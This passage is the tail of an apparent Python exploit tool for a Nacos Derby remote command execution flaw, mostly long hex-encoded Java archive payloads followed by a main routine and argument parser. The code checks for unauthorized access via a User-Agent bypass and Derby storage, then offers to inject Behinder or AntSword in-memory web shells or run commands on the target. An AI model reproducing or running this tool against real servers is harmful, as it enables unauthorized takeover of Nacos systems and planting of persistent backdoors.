ca4923eb40458f08e40e74355f6e560a5c2fd9f153640594a1b726c66849eaef29f0d63725d52d67a1c42d6f12a398de621828176f970d6b7874f959baf58636a2f0151b689cc52297658be6540a236e2391bcca0a6cc9da4337e5d982a3cf248a2d50be26f058a96fb571912b55a5390c791f0367f0ac81c70cdc7a6e4815fbdbaa3c586908290ee10c2db9f7ac2dfb3065cf90f72be0e7e40388167c99ae71a0de9084be9c211f54900f910708dcf8d27df7bef4858ffff2f1275e7efa732fddfbd8cbf77fe0a5773f3cf9d293f7fde2d377cd1f88b4f85c963ff0ca93c75f3e76f74b8f3e337f20c0617c73c2fc8110dfc6381f9a3e44e05045c81e66ab6c2ac71dce8962f5308ac995c5c3ee4a569fefc9166b0e90f7bcad2e26b26f2eeaeb4ef3e0bfa599a831e60d4502a1695db4d50cc5bdd6a8d9c367f9b6d8c82e2f87ed4b0b5ac119d1e89d61be16d5fb975c49c382832dfad35cd0589e6d36ac6abdbe2224eb1da75313d124fcf9acde97d76bd2f6769b9f3626baf9fc9cd06ca6c325a3d3e7d3a4d42693c1d09e2d8aa644b23cab571bc5aed99ecc86f5f6b826d57598027a5331e16f971d3a5ddbee352cb79375ceed8ac762d16c2392773abca5a4ba1b4f729106eba884cc3366afb1dc9ef51bf5917ac6df549bbb4b4576daeceada6de169215bec268d73a2cf6f9b2b1b2d2d5b2d1ff7e6054bb21d990968accd46828f66aba9727ed955af6975dcec9c26ad2ecfce19030b857a345c6e4c2f87c25e93ad6d37a5ebc696c5510b15d586c2723bcb66f9457d6aa968f6d86734b5e5a5742455ec2c9a9ae90c9b9a9bb1d6c58676a123889190db9eebb8bdcd88b6da0de5c32e9bb5d434baacb5a4bae8ebb4bbaccbb2ac0904aab66832a2336b4ce14278a9ec321ad888db57ad1a22b67038506886bdcd4639552e852371db32d788a66bc6b8bdca2717ed917aa7d0e1384f3ab9183016a7bdcb3a8fd5dc12c221a726ece3bc86a8ceeee2f3e5c564d26bae26ead9a0a59c28a55a8ec58e5bf0bbc216877eaee1aa7812dea82fe2b45aa7f5b660d61570c423feb8d760af5b62cb5d873d56ac6803a95635e732a4dbfe6cccbb10cd381265dd5c35e0680a422e5eb5547973d3d374547947b49498d114b39a1973bdde609797bdd6562cba58ade64b623c9a66c3c96a6546b0b8e29ad2ac508bfb44ae6e5af6ea239db01889954c7ab1359b8dce759ad9562c6cb5478ad5a421d208078da2a338d79ee1bc4bf1606839ec2958ea95d9a5b43ba235fa8b5cada86bd604ad2518ce46acdd643e912bfb5ca688cbe3696bedd1546e29d0a899f4c900ef8a2f476abe4437edb6e9b333f98251ccd735d6b8d0d02d8742558fdde38f1b7355319ed096788dd6b894e6ea5a3e17ea16ac096f62311f0bcfe474ce5c81f754594b34e1d794e6f0dcef0dba227e5b281a8dcfd66b89bcdd6ef375ed5e53a252c25076eb1b56c155892d56032e4ec7659df140465bf77ae2669e0bbb334dd120b8b5ee5931ae6d1a726987abd91035c5b05d178984e22507cf1ac2266dae2dea4527d7350bc96543256175680d2551f4b45b269b5070fad96e662ee34424cc7abac570a051104d36a3305be21295a236edebb2f678d4c259624efdb2adec6877428574c4578aeab9d24c25be5410176692855c24d49d4db6ea7cded75a5eca57528682a658353a16d46e4741572dba83f56c57d766f36c6dd6dc8ac7232dab3bce8bee7cd6e48c55e61c8bbe48cdbf1ce9b69d9a64b41813aacd68a2145b36866a73ec722b5fb2988d49b52d6b4916f409d69a405034cc2e163dd625b55d6d886ad26d9bd1d89e8bc575a552c01b8f98665a8b6a432c6f4ad99c9dbc5ad74ebb03214dc43613e6f3954c42ddf18674b9aa5a88b7f9a62332db8936671cae8c2967adba134e43c7e9e2d2c5bcdf1d337039ab33a72b6b8d0d4353cc6b13c17822138e1a85bad73513cbcc7879359bcc25bb412b574d183c9a40d1bee814a63db1502a95450c4f76b2e1c54e40c709468d3798c41b9b88beb275ad5ab7c7693488197f2d6c9e8e994c554753d4a7ed1ac75c88efa60ae5b0894bf84241215aa917ec85763955b405a617b59d4a79b66b31098d85acaee133e867ad814ebb6ac9782cd974a16aac3403a6daa2b060f465aaf14eb7a0f73b2c85a6a56388e4f3f98e31b7545377055d5adbe616fcf69a3e32ed100ab6146253a3e571574cf650b5eb2816f3858ac91b77e8c5b954ae920c55178bcbf19c80e095e40bb5463c9372993a259fbe568a07f8526d4ec757a30be5b970ccc3b9da2eb5b6e9d32f351c7e75692913f7cd2462be698b25d16aa8b9a55cab63d62ed6bdeddc6cbee876270c05736ec1dc4eb7bc96b8d7e6728a9598d6bb98d071c9595b37686acdf18b33e594bdce3bbc0bf95acaac2b2ce9b8a08b3569a653069b90d0a9c5b09177b8786751c8393481a66875b25567a7a96937232ebf672655d5711e355faed8aa0e31e6afc5db165db992f6e45caedc72ba2ba48d1153d1396becc4aaad6eabac5f30559622de64646669d6ee9c31a65a4b8185b83f9fb75bbd8db63ba3b789bea596665a9f4b3663cb6ccdbba435371612e262b7dcd1b60c9178ae150dc72ad9283a571d736a2c6e0f6b8a3a5da1e842251d49073b36ef5c3e973305966766da6cad69138cf9c5d9997c436f2b9a4341addedcf5b40a73e5647b6ea1c34f67178369b5c317cf06d506ff5cb9d0703bd355e34231b39cac98d9ac103465ade952c29a4b1acbcb117f60d1c706ec260ca0723b137204e7ca19a377a1632fa20a265f936df2ed5cb3c55afcc65cc15071e4f571d6160bb3fa5c35caba730ebda65ef32e74a717e65c796fc6be9c0d73e95473319b0ab52d1e5dcbafe3dce69831646c04d44b7e7faa182bd5c47cb2cba7667dfa52d93a1da9d753eaa5566ac6cd2f75e2ddb98c29ce72718f4edba8f0c9d985f092336c4f1b93866e65b9d969e8d21d7fa358aab9d49dccb23e1c9c2ef35d63aa365bf0796b0dbdc027666c11b6136567f3b1f692b098eec60a6d6fd6847bd0743991b389b1a5a04e9f0ec78c2e9f4bb760cfb7bd794bd415d0c45bfeca52b9645eccc53d199f2f1c482dda73e1d4acd3389d8d59e672d3e282598387961b6f54c003e4017cc08715f027f00843dea5201f261f61c8bb15e4a3e4630af271f2a0029e812f29e09bf02d3c036e73df1ff44a370ce926422fee9bce4ca17e2181d62b7aedba025e857f559087e0bd042ea1350c166fe282854d15b242a5514efb850a3df5550405f904f9635a8c900ee50af89ff0af526982af5fa5c11be059c50c05f924f914431e56904fa3d8e44fc82378940c8a6c39cd0ae97eb144413e431e25b0a757475a2825b9749a5b1f7c0c7eaa209fa592a9fc78f6c5a37331ca25d96ad5baf1a27fd9e6d9db508ce3f54e3af1d2eac2ba35028db2c897b835035227ac28c8e7c8e30af2795c1ade0fef55903f254f28e003d882bf81bf55c03fc1cf50e06d2fb6a8df967e867c4141be082715e44972148fe30a728c3cb5c923bdf3bb823c4d9e51902f915505394e1edce45ff453a5d5ab5491c30a72823cab205f262715f0132ae269b8572a0194fbc5091b97a11efd3d81e90de76a51b2d061ea9ec3780a48097c15eff1875b5cf2f0fa34f215f2c47f719a54cbb86ac38c41a501c9abc54a679dfb9b219382e62be4aba8507d736d66e7da77bf0aa058abc648bc29bd8daf575911b9d3d240606139bc100ce108128603ee7e455301efa1d1a4d94e945445e00e9babd5229f926e42f60d65150539459eeb2db3ce0caf696b52a0e8162e53a1b533c5c64e869ca61efd1acedd54955190af936f28c837e1c37801ab37ca874b7c3d75d8620e2e18f5b6418163502191aa020af22d72b41f3a3d8f0c2a273499d7e68cf5e610d8ffbae50bccf5d7ab5bd04c787ec0e35c150b4af482827c9b7c4741be4bbea720df272f2ae0dfe0df19f2670af2e7e407042e7dfd8bbf82fc903ca2203f227fa1203f268f2ac85f92bfc27c7e831b3581036f749f56909f503f5ff926ead3835c434b387d1bd6d8b9b9fe89ce5eef70a27359cc0402eab34b03ce72b3d28ba0908494dbcbddabbd55443bc5d873a856ae235a8abcc46b03c945e72a476cbe1e77ea22575a2b0da37a7ebc2faf179bcedfa61b13a74abf8ab8ca9eedea711102327e4df9bd9baac403a3d0e2498ead7ba55af8f0c1eb120446cad2c7e65f13d64b2d68a45e9a4b057cdc7f68d565e3f2d61c2b04b95a832ba7b8eb29c3b102d70972c872f72611b0ebfa4d9926d10c67e95336f81102553fbb32498b6498b75bd41e148870c53deb15fe4d882f132b835f312eda38750db525a3ed483504812b8b83fd77b325d64af93b0732ae6d5c456cf4a5befa0d7e0d1ae8b17b6304895c96f21909c5fd0bbd322d22459115b8f420646ede86edd9d5a7edca7b6b35300a8bbd04e4a56d6ae460822acd34d96283f36568a0383732e88b458b56bd821f01d336667fb3a5ba8932d7eae54a0a394dd032be54c3a72b6f1bc5b4b25f6f24eb7dbfedd92cdddaaf5c0ce2792f2e6fdc864be21cc5eded5c72e106bb5b3795fbaf3878dd1b17fcf7bf2e01fd39e2cd9a6ab84a4bdb6f50497e3d06bbaa3db4c0e3614860a9bde92f4083581aa535f5c87a26504cdd50e1a64323bd049028d10fa32d81a73f0331f8ed74528209b1b2b623d150926af4179ea3b88c88b7c1b4fdaea9374894ade569fa4350b051e584542fd19467650976eedfde516b393086f0c416ebbd1ca387d5128778487f65ac4be9be5d41572e99ae5e67b31c5c0e77c311a0ffed8671b807ee0502f7e1970986b00530f11410e5d02a0c2b478ee2e710fc213ee5f8c621908102eec796a2470aef8277e39bd0c34e9fcd14bee9d8b072747dfa98d4b56bc3d461f823789f34f5fddb4c1ddb3af5fc6da7e25919a9e8543df6d231f94960e24ad97118dfcae1c20d1ce47d0e1fc4bf11ecf910fee185a82fc68f91d728be8d878e83fcd02a4cb8d5cf82828067f259d841e041b8181b3b09780f4d1d875df32387a65423ab70deca999fadc088fb1872198119946837bee9fa57a0d500f6e1d72568f0fd70002e856be132388cad191c35c095926c8790e25a60e023f0516c1d809df0316c0de39c83f0715c964a6eec4bfe505f97ded827b0f5c7bd35cec07930ccc02719f814030f03fc160e5818f834b516def6901b6a38f4537cefc4aece4950c68fc3f96ee505ca3d2760ef69b810ff798877727e443572ca383a6c1cdb33b667f41162568dec19d3ce332a66152e52aa5661df83f0f4d40bf0a48a515e7c022e51eea78f4bf1711a2e9b97a964ab70e059b89cc0fcb86abc6fb63b690bed362f57c954f255b8628d7e4235b146af5029faf41edaa2f43b5413aa1d48ef9d7a1ef64dadc295ab7095f26a498609f5d4b370cd1044370e5dbb7968e5cc932b67deb9022d2afcc1e7a122bd25daeb94e8df7d0fc1de8d5d6a69ba53ea524e52bda6f0f1ffb9f83d6364e5b5532b344e4ec2e1b86ae4384c3fa73e8aeeb888e448612d48040c0e806b3054ae85bde8d48b301c66400d1698841866460bc3e57e988615d0c09338f275d0c27731c8fe1ec3e725988557600e7e8539fc6b982797c0f564126e2037c18dc401379104dc4c927088e4c0812b2e9012d8490b16a5a0cb6032ac201e7c06436d07f6dc0a8fc26398d82da8c167b14f8eab3f80148fa1643364063e078f03831ce4f079f853941d83a81f923252eb87e95e928227e00b987e1711b61fc48380ed510d02d6073bcf60f4338380bd90812fe29360a8bf063733f0240347318c5f83696980b67f07066cbf0afb7e0343bf85a1a1a943527b9446f98494d1325cee0eb80d8ec15312063c8d7fcfc0977ad94d78c4039a8ff710cf09d0a08bbd18c6136ac97b33de298c07ed2ae83c2b90c6cc5e05fd09309c00e3fca872563937f65530c58795f3c1f8c853707d303e4a9fab70c3fc986a0c21e046d5d814921c890fab469164f804dc8434aad153b4b10a379f06532f83ccc87e747e74f2284ab607d1e0720c832b51e23bd1ddc35238ccd3fc04378e7b30c7bde81a1f520690f6ad481d42ea080643144763108438ba2b81f3df82d0fe36c9ad01d4711ae7adc271c4320f06cd097816356fe1df9701411239bc7de042dc047a2ea42dea2e82ebde2de1d010aefe0ef80a7c15e5a20e53c3c8ef618fe48c532eb4f8195c6f54f2de177b9d146b0803cfbd2a61f9e9b5dda5840c862944a9955629439452c376a3fa92915b5761e1a8faa804ed5479a5245412974e219aa531173292520770fc3c54ec6b18fd4312dc0dc4de07dfc08da81753b8115c84cd6fc2b77a7bc38809b59d40cfff08dd69f75207a36729643be647d5cac5919e5399e0c8c07527c0f93c8c1ca33e1a532e9d00177a0c5bee7e8b59c17890293d6b03def581fdf3e34acf08e285af3fb4d66654634affb66b45716479ebc88834a256067a03aa310cd0c1d8586f16734e7e8c32b86544191a8c84b78ca03d22d298322aa9119b97adc014c236a38c9f9bb4af1612ab9589be88cc061119896e052e9f1f572b6f3927814a36ac4547bc85be47a50135260e2ab80a6fa533df266d106fc71d43ae1aa5dbc7adc388e720efed30ec318ce6f31118b5983f7a043417be3dc062c8ec2643e42051e33b4c6a44c4fedbc90be4bb6b70fb298459803ce6460163a3885ccac8a782392320a726022205c8bb91630739be0333ed9dc8f72ee47c3b06e31d487527b6ee4128bb1751e63ef833e4fa0adc4f86e03de452782f39081fc4d5df47a6e0fdc4091f2061780081ef6328c94748133e4a3e041f270fc183e4283c444ec227c80bf0304af749f27df814f921a6d0fdd239640fcab1039ec73c1c436986e1056c3128cba08f5debcb60927c1bb3791ca59d81ef604b86320ce316f13d6c4de186228de2da97f45b61d4a1377a14cf46df472ee32889025e445de428c7a8840e329a378334c3560f1d68ab870ea3e445f873091d2650871f60128ec0f9e439f821b6464120b7f625bd9d84fa92d28d602f0cf5a5fb11aedf93045b52fabe071412dc2392fc05fea3b04e2212d25c04e39b91868e03f411070954203b9ba0f709f01ff00412fd0eae63e0c76fc3d6fe33b86b9e9b9e721c93b613052a720cc1f50ef84bf82b54fe27f0d3fea1f3297c53a49adb747c7213cff091fdea538fc0e5eafddaf5e3d20ee9eb2042fff83dc364e5cc3f4cae235eef88f81904fd4711e11e43553f8b6701cc43dc6f35f86d44570c8e884ab80afe1a1190a2e95cdf353b7184eeb8784b415753870c49c6c4b3e06ba094f6d55364ffaba8c96083a4dbe31dd8fa1bf8db9e366418dd44b529299308046eb532b596feab90c60dd2dc4781de56368fff8eba951cd27a26959961a43d0d59a424d83c82245e7a2252e63632993a9b8374aa3d84fbca2033f7a1180047f1790c7b9fc6e3cf3398df5fc2f85f954ca04725c6e06af83bdcc5088e5c2fb58670fc6a3c0cd1a3c62498e1bfa1c188b4edfc837443e9475d7fe63faecdfcc7bea1f08e50a081f441e9763082aeee19689c56e1fbeefe31f653d98e9c041e4fcd79f74928c4f18e50f49c84527cf23894bdbb097c45363f225d082a71e3e82760975a3532bc677415aa2b677e8546acad3bfd520c5d40d965b8bfee4697ed8353b8b79f46a77f0d0f72df90b43dd25b11fe19f771ea3823fc1c8f7b78f743aa97e11728d93e0c8757e097c8f372bc5bfc0bd28da03d2fc0c3e0d7d15254b74b60e80c0ee2363dcfc07f67e07f30f06b6c03fc0e4f5a1bee4032fa434b5fd728be6980ed3ea43e01826712f5a94f22fe8bebd7aa9d12c10b28e0b71142bfb3b643d37be5ff4247f46e98ff5bda97c790e2ffc0ffc59983e576e372ff06ffde5fee059c4763ef202e71a567f279504da2ad1ade29baeed451efe42ab43c2b677e79129a71f571683f275d7df6a04b9bfdb0b906bf01c16b14e16b1c81681742d005082a7bd16d17a23b2fc1dcbd0cf3661042bbd0f854a2611c9521d4fd8724f9c135c90ff6251fc583d297a5001b9c607b3d83c0d901c3bfa3a6fd8d9f81dfcad6d46b228357d7ac69c13e7a60d979484df3842608ee7e5b6fa87f2f09b7b74709ffd9176427ba890ab29eb87760645e477f79e9711fda27dd1151f94318370fe29515cf992bc05053ce8f90f951d5089e4f475f80ac6aec79484ebe00567a9ae8cc33c346d91e998a41a43aac62f6c8109dba68f5773c08aafee73b4f3d043ba4f6fc28852d19c2d60ff02ea31a534f4ac97e03f69ff92c3ddba083e6c756ce3c4417529c84dba89b6e7f4e354a8fc53db9f6a9460942c2cd47e719e92684a7813b8fc35d487368bb6e54ea6a68401b157e18d17005d55ec5243985ef5efa94e1627cfe137af967e8c37fc6af9fe38c97d134bf40cc7c05d3fb977848fe173c30ff0a6f35afe016f96be0d1250d8cbb36fabe8bdebf0bdbf7a0efdf05bfc1047815b7f3ffc4d57e8fab9d81c7d127ab640481730c4ee376409dd3c508d0e1ff147f65b88a11af29673092baf8f71d42f7a2c731223e8ff717061379d0a2713988ab17fbeec4161e51862567bf4846c8286a75011ed169ac8da03eabb8eab3186b17c353b8f6490c111a6dd3b073a71583ed35ba73fd8621f4f97b4477324e267f0ba343131686c82776841832b1d3818fad704f146b558eaba5a501c64fc2dd88667f103d4677f8f5620f92cac80e20f887314676fe3f504b0708c3f9d8254e1d00004d320000504b01021400140008080800a3adf0587f64045e38000000370000001400040000000000000000000000000000004d4554412d494e462f4d414e49464553542e4d46feca0000504b01020a000a0000080000a3adf05800000000000000000000000009000000000000000000000000007e0000004d4554412d494e462f504b01020a000a0000080000a3adf0580000000000000000000000001200000000000000000000000000a5000000546f6d6361744d656d6f72795368656c6c2f504b01021400140008080800a3adf058c3f9d8254e1d00004d3200002900000000000000000000000000d5000000546f6d6361744d656d6f72795368656c6c2f436f6e66696775726174696f6e5574696c2e636c617373504b05060000000004000400140100007a1e00000000" 110 | else: 111 | # cmd 112 | return "504b0304140008080800f888ec58000000000000000000000000140004004d4554412d494e462f4d414e49464553542e4d46feca0000f34dcccb4c4b2d2ed10d4b2d2acecccfb35230d433e0e5e2e50200504b0708b27f02ee1b00000019000000504b030414000808080041a477530000000000000000000000000a0000002e636c61737370617468758fcb0ac2301045d7fa15257ba7ba73d12822151454d0ea566232b4d138297914fd7b2d288ad0ddcc70ee706e36bddf4cd2a0f3da12672318b204495aa5a9e4ec502c0663369df4336984f7b508d5a4dffb2e48c13d92ab26c599b4c492f6c8997525a034baf6081715c08848b27a7d84d52e3fcdb79b62b6dce4bbf49fd314d09130a0f01c4b88fa9d4407fb204809a78eebe25163ba128dd8e783118c59da69e49dfc18b563376863a863f8b0674d2d9ba53f9d9f504b07089cd2c70cb600000027010000504b030414000808080041a47753000000000000000000000000080000002e70726f6a6563747590410ec2201444d7f6140d7b41772e285d68bc807a00849f86a60502b4f1f842c1c69ab89b19e6ff07d0f6350ef50cce2ba31b74c407548316462add35e871bfee4fa86515b5cef420c205bc70ca865866d58e6a3e020be003b64650b2d8180b338ea003a3e4a3625836f8a4c9b7794e6a90370b229ae2ce718c6b99820231aec32006653de05e062c8c8b82cf7ce9835be17180bb6e4a549f2dd9784a7e0825281788b43039c8d5acffb3f379422fbdb46b1d5fdfb8f9b237504b0708fc3d8721ba0000006f010000504b0304140008080800f488ec5800000000000000000000000016000000746573742f706f632f4578616d706c652e636c6173738d556b731355187e4e73399b746921504a00b9782969691b44504cb02a50b418526cb13554d16db2095b926cdc6ca015efe2fd7e9df19b337e808fe88794b1337ed419ff8d7fc0fa9c4dd20b0d23ed4cced9f3beeff3bcd773fefef7f73f001cc18f121d029b5db3eac62b76363e3a6f942a4553c2cfd339e38a112f1ae5427c7c76ceccba02c1e356d97247047cb1fe2901ff493b6786e1434847004181ee945536d3b5d2ace99c37668ba6402465678de294e158eabb79e8772f595525bb93374959c9b0ca02db6333a955fe49d7b1ca8564ff94862d029a55c9dae5bc55084360ab8e6de8a19d396f6605fa626dcc361e85d08ba8c48e75514e2e545db3a46327763142bbc6807b1aa6961d3f473b97d6a6514a86711ff64aec217b1bb18e7dd82f202beaa8c8587adaf9a4d2673805a6616b9b48c9ef98ae4ad10691c401a6e7cee313b57cde74c2e84348c38040a0e6e6878e6918a4237675b86c9458a85e0ceb88ab6c75164cf79c63574cc75dd0f03095a6ad72cebe5a0de3111c9538b23e311e858e47f19840b8ea1a8e5b9db6dc4b7709ed8286c7194061f67218493c21715c60cbaada44adec5a2553c7089e241c3d699e28b8b5b56a1e2715cad3aacc27040efc4f7d1954d6ac5669730aa72546d73137853a9ec1b3025d641e2b576acdb209f4b6d859cf350266fc8c40b48d64c234722ae96348a901382b30106b8bd0aefe12e3ad3a52bb513f33d7824ce3790539c1f658856c0869abea7c5ec70b6017058d4ac52ce70406efa9f51b4449c5f0a28e0c2e709ee8634e4daec0b6589b619178899296138dc369c772959f330849bc72e720b4a41761a82866d745d1107a51e49097305bd61ee7e87cd6acb8965dd651003bacbbd2982c237bf9bc6364a9bc23966a43e6e1cd604ec765751305b245bb6a2a0fe6243883bd1bf36015994c0d15a6707462627c221146098ef277bf427275d4bcecb876c34289afaaa4cf0b0cdd63ae3d8ea4b27455cd5c8937d6e46a6c7c255ace4bb6c4220abab3b54d3f0b74cce619fbddeac909ce5e329caaba348276356da871f2e5d535dbd3b62529b5aa8ec0ae76d266a329526785744397aadbbae8b58d305768d617912ac1ab5e7dd8eba9762d946cdd944aa5a76d65053679f53f6b54bc0744e2bbb5495c3bc2e149bbe664cdd3967a66f4e6ab32ac54b19f8f850feacfc71d9f2bfe4a7ec5b90aae81814568bf72d381307f83de6127ff01bda1c07513d710bad0dd343e43ed0eae5d91cdb77959ff86ed07ebd8bd8ad2e5517611ad9bb65b3cb4ed0d0bdc8f073c1e0d0fe221e285d443d6c0ede8879fdfc0cd25f46516113b1be94f470edec650c21ff5ff89cd517fe4501d877f4230722c7d1b89813a9e4a91fa6422b084b14c3430b488e712c125a433d1e022ce25a4486837101e8c6a754c4e47651dd39984f6d7f23f377022bd841992bc9cf02fe16226ea5fc4ab89c05034504736eaafc352bbe20d04145e2913b117f19a3aafd671a58e855b8375bc7e8b31693038d039bc8d4ff039ae317295810b8c178c4be3ebd3891d8820ca52ec64ccbb31c877f430f6f021d8cb3b741f52948c332f535c0d6a98cc4b9963b3800344edc7750c10fb20bec4307ec1212f9bd7bd9adcc49bd405118fe12dea0aca03cd9d869ff10edea5879d447e8f7a3e7a318ef7b9f3933f4e8c0fa83dc27a7c888f589131faf93199243deac1a7d4d3e8cb083e635c3e7a74145fd0073ffd1ac057f89ab6df90bb06b94ca703924fa8441f17b5c3329542dec7a99553896f25c624d29e46709931f89a661012b965061c5cc1c949cc48de64945c13cbec12df0a1c6905bef7daed87ff00504b07080f80d8062a050000d5090000504b01021400140008080800f888ec58b27f02ee1b000000190000001400040000000000000000000000000000004d4554412d494e462f4d414e49464553542e4d46feca0000504b0102140014000808080041a477539cd2c70cb6000000270100000a00000000000000000000000000610000002e636c61737370617468504b0102140014000808080041a47753fc3d8721ba0000006f01000008000000000000000000000000004f0100002e70726f6a656374504b01021400140008080800f488ec580f80d8062a050000d509000016000000000000000000000000003f020000746573742f706f632f4578616d706c652e636c617373504b05060000000004000400f8000000ad0700000000" 113 | 114 | def main(self): 115 | self.base_info() 116 | if self.check_vul() == False: 117 | print("[-] The interface does not allow unauthorized access or the Access Token is incorrect!") 118 | sys.exit(1) 119 | if self.check_derby() == False: 120 | print("[-] The current storage mode is not Derby and cannot be utilized in the future!") 121 | sys.exit(1) 122 | 123 | while True: 124 | option = input("Please enter the number of the operation you wish to perform:\n1. Inject Behinder MemShell\n2. Inject AntSword MemShell\n3. Execute Command\n") 125 | self.javahex_exploit(option) 126 | break 127 | 128 | if __name__ == '__main__': 129 | print(""" 130 | _ _ _____ _ 131 | | \ | | | __ \ | | 132 | | \| | __ _ ___ ___ ___ | | | | ___ _ __| |__ _ _ 133 | | . ` |/ _` |/ __/ _ \/ __| | | | |/ _ \ '__| '_ \| | | | 134 | | |\ | (_| | (_| (_) \__ \ | |__| | __/ | | |_) | |_| | 135 | |_| \_|\__,_|\___\___/|___/ |_____/ \___|_| |_.__/ \__, | 136 | __/ | 137 | |___/ 138 | 139 | Author: wileysec\n\n""") 140 | parser = argparse.ArgumentParser(description="Nacos Derby命令执行漏洞,默认使用User-Agent绕过漏洞请求执行命令,如有AccessToken请指定参数执行!",add_help=True) 141 | parser.add_argument("-u","--url",dest="nacos_url",required=True,help="对指定Nacos系统地址进行利用") 142 | parser.add_argument("-a","--token",dest="access_token",required=False,help="指定Nacos的AccessToken") 143 | args = parser.parse_args() 144 | nacos = NacosRCE(args.nacos_url,args.access_token) 145 | nacos.main() 146 | --------------------------------------------------------------------------------